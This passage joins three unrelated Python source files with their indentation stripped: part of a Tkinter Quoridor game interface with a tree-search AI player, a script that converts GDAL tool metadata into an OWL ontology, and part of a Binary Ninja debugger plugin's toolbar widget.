self.tk_canv.create_rectangle(x0, y0, x1, y1, fill=fill, activefill=hover_lighten,
outline="")
midx = (x0 + x1) / 2
midy = (y0 + y1) / 2
self.tk_canv.create_text((midx, midy), text=text, font=("Arial", 14, "bold"))
self.buttons.append(((x0, y0, x1, y1), callback))
def set_movetype(self, type):
self.moveType = type
self.refresh()
def toggle_movetype(self):
if self.moveType == "wall":
self.set_movetype("move")
elif self.moveType == "move":
self.set_movetype("wall")
self.refresh()
def toggle_flow(self):
self.disp_flow = not self.disp_flow
self.refresh()
def draw_panel(self):
# panel bg
width, height = self.canvas_dims
midx = width-self.PANEL_WIDTH/2
c = self.DEFAULT_COLORS['panel']
self.tk_canv.create_rectangle(width-self.PANEL_WIDTH, 0, width, height, fill=c)
# current-player icon @ top
self.draw_current_player_icon()
# buttons!
c = self.DEFAULT_COLORS['button']
x0, x1 = midx-self.BUTTON_WIDTH/2, midx + self.BUTTON_WIDTH/2
y0, y1 = self.BUTTON_Y_START, self.BUTTON_Y_START + self.BUTTON_HEIGHT
self.new_rect_button("Move", c, x0, y0, x1, y1, lambda: self.set_movetype("move"))
yshift = self.BUTTON_HEIGHT + self.BUTTON_MARGIN
y0 += yshift
y1 += yshift
self.new_rect_button("Wall", c, x0, y0, x1, y1, lambda: self.set_movetype("wall"))
y0 += yshift
y1 += yshift
self.new_rect_button("undo", c, x0, y0, x1, y1, lambda: self.undo())
y0 += yshift
y1 += yshift
self.new_rect_button("redo", c, x0, y0, x1, y1, lambda: self.redo())
# "walls: IIII" text
self.draw_wall_counts()
def undo(self):
self.game.undo()
self.refresh()
self.game_over = False
def redo(self):
self.game.redo()
self.refresh()
def draw_wall_counts(self):
width, height = self.canvas_dims
midx = width - self.PANEL_WIDTH / 2
y = self.LABEL_Y_START
for i in range(len(self.game.players)):
p = self.game.players[i]
text = self.LABEL_TEXT(self.max_walls, p[1])
c = self.DEFAULT_COLORS['players'][i]
l = self.wall_labels[i]
if not l:
l = self.tk_canv.create_text((midx, y), text=text,
font=("Arial", self.LABEL_FONT_SIZE, "bold"), fill=c)
self.wall_labels[i] = l
else:
self.tk_canv.itemconfigure(l, text=text)
y += self.LABEL_SPACING + self.LABEL_FONT_SIZE
def handle_mouse_motion(self, x, y):
if self.game_over or self.ai_running:
return
self.recent_x = x
self.recent_y = y
grid = self.point_to_grid((x, y))
if grid and self.moveType == "move":
move_str = encode_loc(*grid)
if move_str != self.active_move:
self.active_move = move_str
if self.game.is_legal(move_str):
self.draw_player(grid, self.game.current_player, True)
elif self.player_ghost:
self.tk_canv.delete(self.player_ghost)
self.player_ghost = None
elif grid and self.moveType == "wall":
orient, topleft = self.xy_to_wall_spec(grid, x, y)
pos = encode_loc(*topleft)
wall_str = pos + orient
if wall_str != self.active_wall:
self.active_wall = wall_str
active_error = not self.game.is_legal(wall_str)
self.redraw_walls(active_error)
def handle_click(self, e):
x = e.x
y = e.y
# check for button press
for b in self.buttons:
(x0, y0, x1, y1), callback = b
if (x0 <= x <= x1) and (y0 <= y <= y1):
callback()
return
if self.game_over:
return
# check for turn execution
grid = self.point_to_grid((x, y))
success = False
if grid and self.moveType == "move":
move_str = encode_loc(*grid)
success = self.exec_wrapper(move_str)
elif grid and self.moveType == "wall":
orient, topleft = self.xy_to_wall_spec(grid, x, y)
pos = encode_loc(*topleft)
wall_str = pos + orient
success = self.exec_wrapper(wall_str)
if success:
self.refresh()
def handle_keypress(self, key):
(cr, cc) = self.game.players[self.game.current_player][0]
if key == "L":
cc -= 1
elif key == "R":
cc += 1
elif key == "U":
cr -= 1
elif key == "D":
cr += 1
move_str = encode_loc(cr, cc)
success = self.exec_wrapper(move_str)
if success:
self.refresh()
def wall_on(self, wall_str, error=False):
color = self.DEFAULT_COLORS['wall'] if not error else self.DEFAULT_COLORS['wall-error']
if wall_str in self.walls:
box_id = self.walls[wall_str]
if not error:
self.tk_canv.itemconfigure(box_id, fill=color)
else:
# instead of just changing the color (as above), delete and redraw the wall
# so the error-colored rectangle ends up as the topmost canvas element
self.tk_canv.delete(box_id)
(x0, y0, x1, y1) = self.wall_str_to_coords(wall_str)
self.walls[wall_str] = self.tk_canv.create_rectangle(x0, y0, x1, y1, fill=color,
outline="")
def wall_off(self, wall_str):
if wall_str in self.walls:
box_id = self.walls[wall_str]
self.tk_canv.itemconfigure(box_id, fill="")
def redraw_walls(self, active_error=True):
for w in self.walls.keys():
self.wall_off(w)
for w in self.game.walls:
self.wall_on(w)
if self.active_wall:
self.wall_on(self.active_wall, active_error)
def exec_wrapper(self, turn_str, is_ai=False):
try:
if self.ai_running:
return False
self.game.exec_move(turn_str)
winner = self.game.get_winner()
if winner is not None:
self.game_over = True
print("GAME OVER")
self.refresh()
if self.game.current_player in self.ai_players:
self.start_ai(self.game.current_player)
return True
except IllegalMove:
print("ILLEGAL MOVE: %s" % turn_str)
return False
print("FAILED")
return False
def start_ai(self, player_idx):
def get_and_exec_move(game):
mv = monte_carlo_tree_search(game, simple_value, simple_policy,
self.ai_depth, self.ai_n_playout)
self.ai_running = False
self.exec_wrapper(mv, is_ai=True)
print("AI FINISHED")
self.ai_threads[player_idx] = Thread(target=get_and_exec_move, args=(deepcopy(self.game),))
self.ai_threads[player_idx].daemon = True
self.ai_running = True
self.ai_threads[player_idx].start()
print("AI STARTED")
def draw_squares(self):
for r in range(9):
for c in range(9):
x = self.MARGIN + self.SQUARE_SPACING / 2 + (self.SQUARE_SIZE + self.SQUARE_SPACING) * c # noqa: E501
y = self.MARGIN + self.SQUARE_SPACING / 2 + (self.SQUARE_SIZE + self.SQUARE_SPACING) * r # noqa: E501
color = self.DEFAULT_COLORS['square']
sq = self.tk_canv.create_rectangle(x, y, x + self.SQUARE_SIZE,
y + self.SQUARE_SIZE, fill=color, outline="")
self.squares[r][c] = sq
def draw_goals(self):
for i, p in enumerate(self.game.players):
color = self.DEFAULT_COLORS['players'][i]
for g in GOALS[i]:
(cx, cy) = self.grid_to_point(g)
top = cy - self.GOAL_SQUARE_SIZE / 2
left = cx - self.GOAL_SQUARE_SIZE / 2
new_square = self.tk_canv.create_rectangle(left, top, left + self.GOAL_SQUARE_SIZE,
top + self.GOAL_SQUARE_SIZE, fill=color,
outline="")
self.goal_squares.append(new_square)
def generate_walls(self):
for w in ALL_WALLS:
(x0, y0, x1, y1) = self.wall_str_to_coords(w)
# regular wall
r = self.tk_canv.create_rectangle(x0, y0, x1, y1, fill="", outline="")
self.walls[w] = r
def xy_to_wall_spec(self, grid, x, y):
cx, cy = self.grid_to_point(grid)
dx = x - cx
dy = y - cy
# wall orientation: rotate (and scale) the cursor's offset from the square
# center by 45 degrees; same-sign rotated coordinates mean the cursor is in the
# left/right quadrants (vertical wall), opposite signs mean top/bottom (horizontal wall)
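# e.g. a click straight above the center (dx=0, dy=-10) gives rotx=10*r2 and
# roty=-10*r2, so rotx*roty < 0 -> 'h'; a click straight right (dx=10, dy=0)
# gives rotx = roty = 10*r2 -> 'v'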
r2 = 2**0.5
rotx = r2 * dx - r2 * dy
roty = r2 * dx + r2 * dy
if rotx * roty >= 0:
orient = 'v'
else:
orient = 'h'
# wall position (top-left)
gr, gc = grid
if dx < 0:
gc -= 1
if dy < 0:
gr -= 1
return (orient, (gr, gc))
def wall_str_to_coords(self, wall_str):
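# wall_str is a two-character location code (whatever encode_loc/parse_loc use)
# followed by an orientation letter, 'v' for vertical or 'h' for horizontal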
grid_pos = parse_loc(wall_str[0:2])
orient = wall_str[2]
cx, cy = self.grid_to_point(grid_pos)
wall_len = 2 * self.SQUARE_SIZE + self.SQUARE_SPACING
wall_wid = self.SQUARE_SPACING
halfwidth = self.SQUARE_SIZE / 2
if orient == 'v':
x0 = cx + halfwidth
y0 = cy - halfwidth
x1 = x0 + wall_wid
y1 = y0 + wall_len
elif orient == 'h':
x0 = cx - halfwidth
y0 = cy + halfwidth
x1 = x0 + wall_len
y1 = y0 + wall_wid
return (x0, y0, x1, y1)
def draw_players(self):
for i, p in enumerate(self.game.players):
self.draw_player(p[0], i)
def draw_player(self, center, num, ghost=False):
xy = self.grid_to_point(center)
if not xy:
return
x, y = xy
# remove old ovals from the board
oval, text = self.players[num]
if not ghost and oval:
self.tk_canv.delete(oval)
if text:
self.tk_canv.delete(text)
elif ghost and self.player_ghost:
self.tk_canv.delete(self.player_ghost)
# draw new
c = self.DEFAULT_COLORS['players'][num]
if ghost:
bg = self.DEFAULT_COLORS['square']
c = TkBoard.alpha_hax(bg, c, 0.4)
radius = self.PLAYER_SIZE / 2
oval = self.tk_canv.create_oval(x - radius, y - radius, x + radius, y + radius, fill=c,
outline="")
text = None
if not ghost:
self.players[num] = (oval, text)
else:
self.player_ghost = oval
def clear_ghost(self):
if self.player_ghost:
self.tk_canv.delete(self.player_ghost)
self.player_ghost = None
def grid_to_point(self, grid_pt):
"""given (row, col), return centerpoint of that square on the canvas
If not a valid grid point, return None"""
r, c = grid_pt
if (0 <= r <= 8) and (0 <= c <= 8):
x = self.MARGIN + self.SQUARE_SPACING / 2 + (self.SQUARE_SIZE + self.SQUARE_SPACING) * c # noqa: E501
y = self.MARGIN + self.SQUARE_SPACING / 2 + (self.SQUARE_SIZE + self.SQUARE_SPACING) * r # noqa: E501
halfsquare = self.SQUARE_SIZE / 2
return (x + halfsquare, y + halfsquare)
else:
return None
def point_to_grid(self, xy):
"""given (x, y), return (row, col) of corresponding grid space.
If off the grid or one row of spacing on outside, returns None"""
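# e.g. with the class constants above (MARGIN=20, SQUARE_SIZE=50, SQUARE_SPACING=10)
# a click at (50, 50) gives floor((50 - 20) / 60) = 0 on both axes -> square (0, 0)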
x, y = xy
x -= self.MARGIN
y -= self.MARGIN
full_space = self.SQUARE_SIZE + self.SQUARE_SPACING
r = int(floor(y / full_space))
c = int(floor(x / full_space))
if (0 <= r <= 8) and (0 <= c <= 8):
return (r, c)
else:
return None
@staticmethod
def alpha_hax(back, front, alpha):
"""since tkinter doesnt support alpha channels as far as I can tell,
this function does 2-color blending on hex strings, returning blended hex string"""
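# e.g. alpha_hax("#000000", "#FFFFFF", 0.25) blends each channel to
# int(0 * 0.75 + 255 * 0.25) = 63 and returns "#3f3f3f"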
# get numeric values
b_r = int(back[1:3], 16)
b_g = int(back[3:5], 16)
b_b = int(back[5:7], 16)
f_r = int(front[1:3], 16)
f_g = int(front[3:5], 16)
f_b = int(front[5:7], 16)
# combine 'em
new_r = int(b_r * (1 - alpha) + f_r * alpha)
new_g = int(b_g * (1 - alpha) + f_g * alpha)
new_b = int(b_b * (1 - alpha) + f_b * alpha)
# get hex versions, take off leading '0x' and pad with "0" when len() < 2
hex_r = hex(new_r)[2:].rjust(2, "0")
hex_g = hex(new_g)[2:].rjust(2, "0")
hex_b = hex(new_b)[2:].rjust(2, "0")
return "#" + hex_r + hex_g + hex_b
def disp_time_stats(self):
print(self.time_stats)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description='Graphical interface for local Quoridor game.')
parser.add_argument("--ai", help="number of AI players (Default: 0)", type=int, default=0)
parser.add_argument("--ai-depth", help="AI players' search depth (Default: 6)", type=int, default=6) # noqa: E501
parser.add_argument("--ai-n-playout", help="AI players' number of playouts (Default: 5000)", type=int, default=5000) # noqa: E501
parser.add_argument("--save-file", help=".qdr file path of where to save results on quit.")
parser.add_argument("--load-file", help=".qdr file path of game to load.")
args = parser.parse_args()
tkb = TkBoard()
tkb.new_game(**vars(args))
|
gdal2owl.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author: houzhiwei
# time: 2019/9/14
import os
import threading # both os and threading are used in the __main__ block below
from owlready2 import *
import json
from JSON2OWL.OwlConvert.OwlUtils import OWLUtils
from JSON2OWL.OwlConvert.Preprocessor import Preprocessor
module_uri = 'http://www.egc.org/ont/process/gdal'
onto = get_ontology(module_uri)
onto, sh, skos, dcterms, props, foaf = OWLUtils.load_common(onto)
onto, geospatial = OWLUtils.load_geo_vocabl(onto)
onto, gb, task, data, cyber, context = OWLUtils.load_common_for_process_tool(onto)
print('ontologies imported')
import datetime
onto.metadata.created.append(datetime.datetime.today())
onto.metadata.creator.append('houzhiwei')
onto.metadata.title.append('GDAL/OGR')
onto.metadata.versionInfo.append('3.0.1')
with onto:
class GDALTool(gb.GeoprocessingFunctionality):
pass
class GDALInput(cyber.Input):
pass
class GDALOutput(cyber.Output):
pass
class GDALOption(cyber.Option):
pass
class GDALAvailableChoice(cyber.AvailableChoice):
pass
common_options = ['format', 'formats', 'optfile', 'config', 'debug']
def handle_parameter(tool, param):
pname = param['name']
p = None
_name = Preprocessor.io_name(pname, onto, common_options)
if 'isInputFile' in param.keys():
p = GDALInput(_name, prefLabel=locstr(pname, lang='en'))
p.isInput = True
tool.input.append(p)
OWLUtils.link_to_domain_concept(p, pname.replace('_', ' '))
elif "isOutputFile" in param.keys():
p = GDALOutput(_name, prefLabel=locstr(pname, lang='en'))
p.isOutput = True
tool.output.append(p)
OWLUtils.link_to_domain_concept(p, pname.replace('_', ' '))
p.identifier = pname
if param['flag']: p.flag = param['flag']
p.isOptional = param['isOptional']
p.description.append(locstr(param['explanation'], lang='en'))
p.datatype.append(OWLUtils.get_datatype_iris(param['dataType']))
def handle_options(tool, param, _onto):
pname = param['name']
_name = Preprocessor.io_name(pname, _onto, common_options)
p = GDALOption(_name, prefLabel=locstr(pname, lang='en'))
p.identifier = pname
if param['flag']: p.flag = param['flag']
p.isOptional = param['isOptional']
p.description.append(locstr(param['explanation'], lang='en'))
p.datatype.append(OWLUtils.get_datatype_iris(param['dataType']))
if "available_values" in param.keys():
for value in param['available_values']:
p.availableValue.append(value)
onto, _list = OWLUtils.resources_2_rdf_list(_onto, param['available_values'])
p.availableList.append(_list)
if "available_choices" in param.keys():
p, onto = OWLUtils.handle_choices(p, pname, param['available_choices'], GDALAvailableChoice, _onto)
if "input_pattern" in param.keys():
p.inputPattern.append(param['input_pattern'])
tool.option.append(p)
def handle_task(tool, task_name, des):
config = OWLUtils.get_config(module_path + '/config.ini')
category = tool_class(task_name)
task_cls = config.get('task', category.name)
task_name = Preprocessor.space_2_underline(task_name.replace(".py", ""))
if not task[task_name + "_task"]:
task_ins = task[task_cls](task_name + "_task", prefLabel=locstr(task_name + " task", lang='en'))
task_ins.isAtomicTask = True
task_ins.identifier = task_name
else:
task_ins = task[task_name + "_task"]
if task_ins not in tool.usedByTask:
tool.usedByTask.append(task_ins)
if tool not in task_ins.processingTool: # membership must be checked on the task's list before appending
task_ins.processingTool.append(tool)
task_ins.description.append(locstr(des, lang='en'))
def tool_class(name):
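# classify a GDAL/OGR program by its name prefix into an ontology class,
# e.g. "ogr2ogr" -> VectorPrograms, "gdalwarp" -> RasterPrograms (the fallback)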
if str(name).startswith('gnm'):
tool_cls = "GeographicNetworkPrograms"
elif str(name).startswith('ogr'):
tool_cls = "VectorPrograms"
elif str(name).startswith('gdalmd'):
tool_cls = "MultidimensionalRasterPrograms"
else:
tool_cls = "RasterPrograms"
return OWLUtils.create_onto_class(onto, tool_cls, GDALTool)
def map_to_owl(json_data):
for d in json_data:
name = d['name']
toolClass = tool_class(name)
name = Preprocessor.space_2_underline(name)
tool = toolClass(name, prefLabel=locstr(name, lang='en'))
tool.isToolOfSoftware.append(cyber.GDAL)
tool.identifier = name
tool.definition = d['summary']
tool.manualPageURL.append(d['manual_url'])
tool.executable = d['exec']
tool.commandLine.append(d['syntax'])
tool.description.append(locstr(d['description'], lang='en'))
OWLUtils.application_category(tool, [], ['GIS Analysis'], [str(toolClass.name).replace('Programs', '')])
keywords = OWLUtils.to_keywords(d['description'])
OWLUtils.link_to_domain_concept(tool, keywords)
for example in d['example']:
tool.example.append(example)
handle_task(tool, d['name'], d['description'])
for parameter in d['parameters']:
handle_parameter(tool, parameter)
for option in d['options']:
handle_options(tool, option, onto)
if __name__ == "__main__":
module_path = os.path.dirname(__file__)
with open(module_path + '/gdal_edited.json', 'r') as f:
jdata = json.load(f) # list
# run the conversion in a worker thread with an enlarged stack,
# otherwise deep recursion during conversion can overflow the default stack
size = 1024 * 1024 # stack size in bytes; system dependent
threading.stack_size(size)
# pass the callable and its arguments; calling map_to_owl(jdata) here would run
# it synchronously on the main thread's default stack
thread = threading.Thread(target=map_to_owl, args=(jdata,))
thread.start()
thread.join() # wait for the conversion to finish before saving the ontologies
onto.save(file='gdal.owl', format="rdfxml")
# update task ontology
task.save()
print('gdal Done!')
|
ControlsWidget.py
|
from PySide2 import QtCore, QtGui
from PySide2.QtCore import Qt
from PySide2.QtWidgets import QApplication, QHBoxLayout, QVBoxLayout, QLabel, QWidget, QPushButton, QLineEdit, QToolBar, QToolButton, QMenu, QAction
from binaryninja import execute_on_main_thread_and_wait, BinaryView
from binaryninja.interaction import show_message_box, MessageBoxIcon, MessageBoxButtonSet, MessageBoxButtonResult
from binaryninjaui import ViewFrame
import platform
import threading
import traceback
import sys
import os
from . import AdapterSettingsDialog
from .. import binjaplug, DebugAdapter
def load_icon(fname_icon):
path_this_file = os.path.abspath(__file__)
path_this_dir = os.path.dirname(path_this_file)
path_icons = os.path.join(path_this_dir, '..', 'media', 'icons')
path_icon = os.path.join(path_icons, fname_icon)
pixmap = QtGui.QPixmap(path_icon)
#pixmap.fill(QtGui.QColor('red'))
#pixmap.setMask(pixmap.createMaskFromColor(QtGui.QColor('black'), QtGui.Qt.MaskOutColor))
icon = QtGui.QIcon()
icon.addPixmap(pixmap, QtGui.QIcon.Normal)
icon.addPixmap(pixmap, QtGui.QIcon.Disabled)
return icon
class DebugControlsWidget(QToolBar):
def __init__(self, parent, name, data, debug_state):
if not type(data) == BinaryView:
raise Exception('expected widget data to be a BinaryView')
self.bv = data
self.debug_state = debug_state
QToolBar.__init__(self, parent)
# TODO: Is there a cleaner way to do this?
self.setStyleSheet("""
QToolButton{padding: 4px 14px 4px 14px; font-size: 14pt;}
QToolButton:disabled{color: palette(alternate-base)}
""")
self.actionRun = QAction("Run", self)
self.actionRun.triggered.connect(lambda: self.perform_run())
self.actionRun.setIcon(load_icon('run.svg'))
self.actionRestart = QAction("Restart", self)
self.actionRestart.triggered.connect(lambda: self.perform_restart())
self.actionRestart.setIcon(load_icon('restart.svg'))
self.actionQuit = QAction("Quit", self)
self.actionQuit.triggered.connect(lambda: self.perform_quit())
self.actionQuit.setIcon(load_icon('cancel.svg'))
self.actionAttach = QAction("Attach", self)
self.actionAttach.triggered.connect(lambda: self.perform_attach())
self.actionAttach.setIcon(load_icon('connect.svg'))
self.actionDetach = QAction("Detach", self)
self.actionDetach.triggered.connect(lambda: self.perform_detach())
self.actionDetach.setIcon(load_icon('disconnect.svg'))
self.actionSettings = QAction("Settings...", self)
self.actionSettings.triggered.connect(lambda: self.perform_settings())
self.actionPause = QAction("Pause", self)
self.actionPause.triggered.connect(lambda: self.perform_pause())
self.actionPause.setIcon(load_icon('pause.svg'))
self.actionResume = QAction("Resume", self)
self.actionResume.triggered.connect(lambda: self.perform_resume())
self.actionResume.setIcon(load_icon('resume.svg'))
self.actionStepIntoAsm = QAction("Step Into (Assembly)", self)
self.actionStepIntoAsm.triggered.connect(lambda: self.perform_step_into_asm())
self.actionStepIntoAsm.setIcon(load_icon('stepinto.svg'))
self.actionStepIntoIL = QAction("Step Into", self)
self.actionStepIntoIL.triggered.connect(lambda: self.perform_step_into_il())
self.actionStepIntoIL.setIcon(load_icon('stepinto.svg'))
self.actionStepOverAsm = QAction("Step Over (Assembly)", self)
self.actionStepOverAsm.triggered.connect(lambda: self.perform_step_over_asm())
self.actionStepOverAsm.setIcon(load_icon('stepover.svg'))
self.actionStepOverIL = QAction("Step Over", self)
self.actionStepOverIL.triggered.connect(lambda: self.perform_step_over_il())
self.actionStepOverIL.setIcon(load_icon('stepover.svg'))
self.actionStepReturn = QAction("Step Return", self)
self.actionStepReturn.triggered.connect(lambda: self.perform_step_return())
self.actionStepReturn.setIcon(load_icon('stepout.svg'))
# session control menu
self.controlMenu = QMenu("Process Control", self)
self.controlMenu.addAction(self.actionRun)
self.controlMenu.addAction(self.actionRestart)
self.controlMenu.addAction(self.actionQuit)
self.controlMenu.addSeparator()
self.controlMenu.addAction(self.actionAttach)
self.controlMenu.addAction(self.actionDetach)
self.controlMenu.addSeparator()
self.controlMenu.addAction(self.actionSettings)
self.stepIntoMenu = QMenu("Step Into", self)
self.stepIntoMenu.addAction(self.actionStepIntoIL)
self.stepIntoMenu.addAction(self.actionStepIntoAsm)
self.stepOverMenu = QMenu("Step Over", self)
self.stepOverMenu.addAction(self.actionStepOverIL)
self.stepOverMenu.addAction(self.actionStepOverAsm)
self.btnControl = QToolButton(self)
self.btnControl.setMenu(self.controlMenu)
self.btnControl.setPopupMode(QToolButton.MenuButtonPopup)
self.btnControl.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.btnControl.setDefaultAction(self.actionRun)
self.addWidget(self.btnControl)
# execution control buttons
self.btnPauseResume = QToolButton(self)
self.btnPauseResume.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.btnPauseResume.setDefaultAction(self.actionPause)
self.addWidget(self.btnPauseResume)
#self.addAction(self.actionPause)
#self.addAction(self.actionResume)
self.btnStepInto = QToolButton(self)
self.btnStepInto.setMenu(self.stepIntoMenu)
self.btnStepInto.setPopupMode(QToolButton.MenuButtonPopup)
self.btnStepInto.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.btnStepInto.setDefaultAction(self.actionStepIntoIL)
self.addWidget(self.btnStepInto)
self.btnStepOver = QToolButton(self)
self.btnStepOver.setMenu(self.stepOverMenu)
self.btnStepOver.setPopupMode(QToolButton.MenuButtonPopup)
self.btnStepOver.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.btnStepOver.setDefaultAction(self.actionStepOverIL)
self.addWidget(self.btnStepOver)
# TODO: Step until returning from current function
self.btnStepReturn = QToolButton(self)
self.btnStepReturn.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.btnStepReturn.setDefaultAction(self.actionStepReturn)
self.addWidget(self.btnStepReturn)
#self.addAction(self.actionStepReturn)
self.threadMenu = QMenu("Threads", self)
self.btnThreads = QToolButton(self)
self.btnThreads.setMenu(self.threadMenu)
self.btnThreads.setPopupMode(QToolButton.InstantPopup)
self.btnThreads.setToolButtonStyle(Qt.ToolButtonTextOnly)
self.addWidget(self.btnThreads)
self.set_thread_list([])
self.editStatus = QLineEdit('INACTIVE', self)
self.editStatus.setReadOnly(True)
self.editStatus.setAlignment(QtCore.Qt.AlignCenter)
self.addWidget(self.editStatus)
# disable buttons
self.set_actions_enabled(Run=self.can_exec(), Restart=False, Quit=False, Attach=self.can_connect(), Detach=False, Pause=False, Resume=False, StepInto=False, StepOver=False, StepReturn=False)
self.set_resume_pause_action("Pause")
self.set_default_process_action("Attach" if self.can_connect() else "Run")
def __del__(self):
# TODO: Move this elsewhere
# This widget is tasked with cleaning up the state after the view is closed
# binjaplug.delete_state(self.bv)
pass
# -------------------------------------------------------------------------
# Helpers
# -------------------------------------------------------------------------
def can_exec(self):
return DebugAdapter.ADAPTER_TYPE.use_exec(self.debug_state.adapter_type)
def can_connect(self):
return DebugAdapter.ADAPTER_TYPE.use_connect(self.debug_state.adapter_type)
def alert_need_install(self, proc):
message = "Cannot start debugger: {} not found on {}.".format(proc, "the target machine" if self.can_connect() else "your machine")
adapter_type = self.debug_state.adapter_type
# TODO: detect remote os correctly, as gdb/lldb are compatible with both macos and linux
if adapter_type == DebugAdapter.ADAPTER_TYPE.LOCAL_GDB or adapter_type == DebugAdapter.ADAPTER_TYPE.REMOTE_GDB:
remote_os = "Linux"
elif adapter_type == DebugAdapter.ADAPTER_TYPE.LOCAL_LLDB or adapter_type == DebugAdapter.ADAPTER_TYPE.REMOTE_LLDB:
remote_os = "Darwin"
elif adapter_type == DebugAdapter.ADAPTER_TYPE.LOCAL_DBGENG:
remote_os = "Windows"
else:
# Uncertain
remote_os = platform.system()
if remote_os == "Linux":
message += "\nYou can find this in your package manager or build it from source."
elif remote_os == "Darwin":
if proc == "lldb":
message += "\nYou need to install it by running the following command in Terminal:\nxcode-select --install"
elif proc == "gdbserver":
message += "\nYou can find this in your package manager or build it from source."
else:
message += "\nYou need to install this manually."
elif remote_os == "Windows":
# TODO: dbgeng does not currently throw this
message += "\nYou need to reinstall the debugger plugin."
else:
message += "\nYou need to install this manually."
show_message_box("Cannot Start Debugger", message, icon=MessageBoxIcon.ErrorIcon)
# -------------------------------------------------------------------------
# UIActions
# -------------------------------------------------------------------------
def perform_run(self):
def perform_run_thread():
while True:
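# retry loop: the only repeat is after offering to chmod +x a non-executable
# target; every other path (success or error) breaks out at the bottom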
try:
self.debug_state.run()
execute_on_main_thread_and_wait(perform_run_after)
except ConnectionRefusedError:
execute_on_main_thread_and_wait(lambda: perform_run_error('ERROR: Connection Refused'))
except DebugAdapter.ProcessStartError as e:
execute_on_main_thread_and_wait(lambda: perform_run_error(str(e)))
except DebugAdapter.NotExecutableError as e:
fpath = e.args[0]
if platform.system() != 'Windows':
msg = '%s is not executable, would you like to set +x and retry?' % fpath
res = show_message_box('Error', msg, MessageBoxButtonSet.YesNoButtonSet, MessageBoxIcon.ErrorIcon)
if res == MessageBoxButtonResult.YesButton:
os.chmod(fpath, os.stat(fpath).st_mode | 0o100)
continue
execute_on_main_thread_and_wait(lambda: perform_run_error('ERROR: Target Not Executable'))
except DebugAdapter.NotInstalledError as e:
execute_on_main_thread_and_wait(lambda: self.alert_need_install(e.args[0]))
execute_on_main_thread_and_wait(lambda: perform_run_error('ERROR: Debugger Not Installed'))
except DebugAdapter.PermissionDeniedError as e:
execute_on_main_thread_and_wait(lambda: perform_run_error('ERROR: Permission denied'))
if platform.system() == 'Darwin':
res = show_message_box('Error', 'Developer tools need to be enabled to debug programs. This can be authorized either from here or by starting a debugger in Xcode.', MessageBoxButtonSet.OKButtonSet, MessageBoxIcon.ErrorIcon)
except Exception as e:
execute_on_main_thread_and_wait(lambda: perform_run_error('ERROR: ' + ' '.join(e.args)))
traceback.print_exc(file=sys.stderr)
break
def perform_run_after():
self.state_stopped()
self.debug_state.ui.on_step()
def perform_run_error(e):
self.state_error(e)
self.state_starting('STARTING')
threading.Thread(target=perform_run_thread).start()
def perform_restart(self):
def perform_restart_thread():
try:
self.debug_state.restart()
execute_on_main_thread_and_wait(perform_restart_after)
except ConnectionRefusedError:
execute_on_main_thread_and_wait(lambda: perform_restart_error('ERROR: Connection Refused'))
except Exception as e:
execute_on_main_thread_and_wait(lambda: perform_restart_error('ERROR: ' + ' '.join(e.args)))
traceback.print_exc(file=sys.stderr)
def perform_restart_after():
self.state_stopped()
self.debug_state.ui.on_step()
def perform_restart_error(e):
self.state_error(e)
self.state_starting('RESTARTING')
threading.Thread(target=perform_restart_thread).start()
def perform_quit(self):
self.debug_state.quit()
self.state_inactive()
self.debug_state.ui.on_step()
def perform_attach(self):
def perform_attach_thread():
try:
self.debug_state.attach()
execute_on_main_thread_and_wait(perform_attach_after)
except ConnectionRefusedError:
execute_on_main_thread_and_wait(lambda: perform_attach_error('ERROR: Connection Refused'))
except TimeoutError:
execute_on_main_thread_and_wait(lambda: perform_attach_error('ERROR: Connection Timed Out'))
except Exception as e:
execute_on_main_thread_and_wait(lambda: perform_attach_error('ERROR: ' + ' '.join(e.args)))
traceback.print_exc(file=sys.stderr)
def perform_attach_after():
self.state_stopped()
self.debug_state.ui.on_step()
def perform_attach_error(e):
self.state_error(e)
self.state_starting('ATTACHING')
threading.Thread(target=perform_attach_thread).start()
def perform_detach(self):
self.debug_state.detach()
self.state_inactive()
self.debug_state.ui.on_step()
def perform_settings(self):
def settings_finished():
if self.debug_state.running:
self.state_running()
elif self.debug_state.connected:
local_rip = self.debug_state.local_ip
if self.debug_state.bv.read(local_rip, 1) and len(self.debug_state.bv.get_functions_containing(local_rip)) > 0:
self.state_stopped()
else:
self.state_stopped_extern()
else:
self.state_inactive()
dialog = AdapterSettingsDialog.AdapterSettingsDialog(self, self.bv)
dialog.show()
dialog.finished.connect(settings_finished)
def perform_pause(self):
self.debug_state.pause()
# Don't update state here-- one of the other buttons is running in a thread and updating for us
def perform_resume(self):
def perform_resume_thread():
(reason, data) = self.debug_state.go()
execute_on_main_thread_and_wait(lambda: perform_resume_after(reason, data))
def perform_resume_after(reason, data):
self.handle_stop_return(reason, data)
self.debug_state.ui.on_step()
self.state_running()
threading.Thread(target=perform_resume_thread).start()
def perform_step_into_asm(self):
def perform_step_into_asm_thread():
(reason, data) = self.debug_state.step_into()
execute_on_main_thread_and_wait(lambda: perform_step_into_asm_after(reason, data))
def perform_step_into_asm_after(reason, data):
self.handle_stop_return(reason, data)
self.debug_state.ui.on_step()
self.state_busy("STEPPING")
threading.Thread(target=perform_step_into_asm_thread).start()
def perform_step_into_il(self):
disasm = self.debug_state.ui.debug_view.binary_editor.getDisassembly()
graph_type = disasm.getILViewType()
def perform_step_into_il_thread():
(reason, data) = self.debug_state.step_into(graph_type)
execute_on_main_thread_and_wait(lambda: perform_step_into_il_after(reason, data))
def perform_step_into_il_after(reason, data):
self.handle_stop_return(reason, data)
self.debug_state.ui.on_step()
self.state_busy("STEPPING")
threading.Thread(target=perform_step_into_il_thread).start()
def perform_step_over_asm(self):
def perform_step_over_asm_thread():
(reason, data) = self.debug_state.step_over()
execute_on_main_thread_and_wait(lambda: perform_step_over_asm_after(reason, data))
def perform_step_over_asm_after(reason, data):
self.handle_stop_return(reason, data)
self.debug_state.ui.on_step()
self.state_busy("STEPPING")
threading.Thread(target=perform_step_over_asm_thread).start()
def perform_step_over_il(self):
disasm = self.debug_state.ui.debug_view.binary_editor.getDisassembly()
graph_type = disasm.getILViewType()
def perform_step_over_il_thread():
(reason, data) = self.debug_state.step_over(graph_type)
execute_on_main_thread_and_wait(lambda: perform_step_over_il_after(reason, data))
